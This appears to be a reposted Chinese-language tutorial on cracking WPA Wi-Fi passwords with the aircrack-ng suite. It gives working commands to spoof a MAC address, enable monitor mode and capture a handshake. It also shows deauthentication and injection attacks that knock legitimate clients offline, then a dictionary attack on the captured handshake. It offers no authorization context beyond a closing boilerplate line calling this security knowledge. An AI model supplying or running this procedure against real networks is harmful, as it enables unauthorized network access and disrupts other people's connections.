無線網攻防Aircrack -ng(抓包方式)
發表時間:2023-04-04 來源:明輝站整理相關軟件相關文章人氣:
[摘要]1.修改mac地址信息。 ifconfig wlan0 down macchange -A wlan0 ifconfig wlan0 up2.監聽 ai...

1.修改mac地址信息。
ifconfig wlan0 down
macchange -A wlan0
ifconfig wlan0 up
2.監聽
airmon-ng start wlan0
3.抓包
airodump-ng mon0
airodump-ng—w dota -c 10【信道】 - -bssid 5A-1F-CC-B1-A1:25 mon0(ctrl+c退出, 保留終端或者-w dota從而保存握手包cap,如果想針對某個客戶端就加個 -c 客戶端)
備注:airodump界面介紹:
BSSID:ap的mac地址。
PWR:信號強度, 如果PWR是-1說明網卡的驅動不支持報告信號水平。 如果是部分客戶端的PWR為-1, 那么說明該客戶端不在你網卡能監聽到的范圍內, 但是你能捕捉到AP發往該客戶端的數據。
BeaconsAP發出的通告編號, 每個接入點(AP)在最低速率(1M)時差不多每秒會發送10個左右的beacon, 所以它們能在很遠的地方就被發現。
#Data被捕獲到的數據分組的數量(如果是WEP, 則代表唯一IV的數量), 包括廣播分組。
#/s過去10秒鐘內每秒捕獲數據分組的數量
STATION:ap上面連接的用戶。
CH:信道
4.Deauth驗證攻擊:aireplay-ng -0 10 -a<ap mac> -c <ap對應的客戶端mac> mon0【通過觀察airmon-ng start mon0右上角查看握手包是否捕獲到了。 如果不用-c那么所有的ap下客戶端都掉線, 都被攻擊。 】
參數解釋:-0指的是采取Deautenticate攻擊方式, 后面為發送次數;
-a ap mac
-c 客戶端mac
注意:Deauth攻擊往往并不是一次攻擊就成功, 為確保成功截獲需要反復進行(WPA破解不用等到數據Data達到幾萬, 因為它只要一個包含WPA4次握手驗證包就可以了, 還有最好每操作一步新建一個窗口, 方便攻擊時候查看數據情況從而確定握手包是否抓取成功。 )
deauth原理:強制讓合法無線客戶端與AP被斷開, 當它被從WLAN 中斷開后, 這個無線客戶端會自動嘗試重新連接到AP上, 在這個重新連接過程中, 數據通信就產生了, 然后利用airodump捕獲一個無線路由器與無線客戶端四次握手的過程, 生成一個包含四次握手的cap包。 然后再利用字典進行暴力。 如果deauth攻擊不行, 或者沒客戶端沒流量情況下, 可以通過注入攻擊。
aireplay-ng -3 b ap mac -h 個人網卡地址 mon。
5.跑字典
aircrack-ng -w password.txt dota-*.cap(防止有時候-w記錄不全, cap包用正則表達式方式引用最好。 )
備注:密碼字典的生成最好是不同的類型的字典放在一個txt, 或者根據特性歸類成不同的txt, 這樣破解時候方便。
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。